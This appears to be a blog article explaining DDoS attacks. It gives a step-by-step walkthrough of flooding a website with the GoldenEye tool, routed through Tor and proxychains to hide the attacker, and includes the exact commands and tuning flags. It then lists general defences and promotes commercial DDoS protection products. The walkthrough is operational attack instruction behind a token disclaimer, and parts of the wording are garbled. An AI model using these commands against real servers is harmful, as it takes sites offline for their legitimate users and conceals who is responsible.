DDOS attack tools are able to direct heavy loads to HTTP servers and disconnect them from service. Today we will tell you about DDoS attacks and how to conduct them.
DDoS – a hacker attack on a computer system to bring it down, that is, to create conditions in which conscientious users of the system will not be able to access the provided system resources (servers) or this access will be difficult.
How does this attack work and who uses it ?
Each web server has limits on the number of requests that a web server can serve at a time. If the number of requests exceeds the allowable limit, the following is quite possible:
- Server slowdown (slowdown in processing requests)
- Total denial of service requests
Most often, the attackers achieve the second – complete denial of service. Motives may vary: from protecting users from fraudulent sites to banal boredom.
But it should be said that not only attackers, but also “white hackers”, i.e. pentesters, use these attacks. With this attack, ethical hackers test web servers for power and ability to handle a large number of requests simultaneously.
DDoS works like this: the attacker creates a network of “zombie computers” (actually, these are not necessarily computers: all devices capable of sending requests are suitable for this attack), and then uses this network for the attack.
Let’s imagine the situation: the maximum weight of traffic that the server can receive is 1 GB. The attacker tries to reach or overcome this barrier. If it succeeds, the server first slows down and then can lie down.
That’s the interesting thing: how to conduct an attack like this? Let us warn you right away – everything described and described below is for information purposes only. You can’t break other people’s servers, it can be a legal problem. We have warned you.
- EtherApe is a graphical network monitor that graphically displays network activity. Hosts and links change in size with traffic. Displaying color protocols.
- Service Tor – Tor allows customers and repeaters to offer hidden services. That is, you can offer a web server, SSH server, etc. Without disclosing your IP address to your users.
Service Tor – Tor allows you to offer a web server, SSH server, etc..
- Proxychains – the latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT. Proxy chains can be mixed with different types of proxy.
- GoldenEye – GoldenEye is a python application designed for security testing purposes only.
How to perform a DDOS attack on a website?
1. Run etherape: etherape, a pop-up window will appear which graphically displays the network activity.
2. Start the TOR service:
service tor start
3. Download Goldeneye
4. After downloading, unpack it in the folder
5. Start an attack
/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com.
Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you do not stop the attack, it will “explode” in some cases. To stop the attack, just press CTRL+C.
Done. After a while the server will slow down and then possibly lie down.
General protection against DDOS attack
- Decrease in the speed of IP connection.
- Utilize IDS, web application firewalls.
- Tweak Connection on IP.
- Secure your DNS servers.
- Set protection means. Make sure you have the appropriate security features installed for both your networks and your apps. This includes key tools such as firewalls, network monitoring software and antivirus software, as well as threat monitoring systems. With them, you can monitor basic network traffic and configure alerts for unusual behavior.
- Keep everyone informed. All these systems must be updated to ensure that any bugs or problems are corrected. Detecting threats as early as possible is the best way to prevent DDoS attacks on critical network infrastructures and impact end users.
- Detect threats as early as possible.
DDoS Prevention Tools
There are several tools that I recommend to prevent and stop DDoS attacks.
1. Security Event Manager
To monitor network behavior and label threats before they become excessive, I like SolarWinds Security Event Manager (SEM).
The ability to respond quickly to a threat is vital, as security initiatives can quickly become useless if they take too long to deploy. SEM includes automatic responses that can block suspicious IP or USB, disable malicious devices or their privileges, and destroy applications that behave unexpectedly. This means that delays when dealing with something like a DDoS attack are kept to a minimum.
SEM also controls the integrity of files and USB, so if something looks wrong it can be stopped.
SolarWinds SEM is available free for a thirty day trial. After that you can see the prices for each node.
Cloudflare offers a flexible and scalable tool that integrates several DDoS prevention methods into one solution. It prevents malicious and malicious traffic from entering your network, while the rest of the network remains functional and high-performance. Cloudflare uses a reputation database to track potential threats from attackers.
Cloudflare costs $200 per month for businesses, but at the enterprise level, you need to contact Cloudflare for a quote.
Imperva DDoS protects the entire network and protects against attacks by processing high-capacity packets. It provides protection against DDoS attacks as always, as well as on-demand, depending on what suits your business best. It also includes automatic update of monitoring panels displaying information about attack traffic. The main disadvantage of the Imperva tool is that it is limited in protection against DDoS attacks.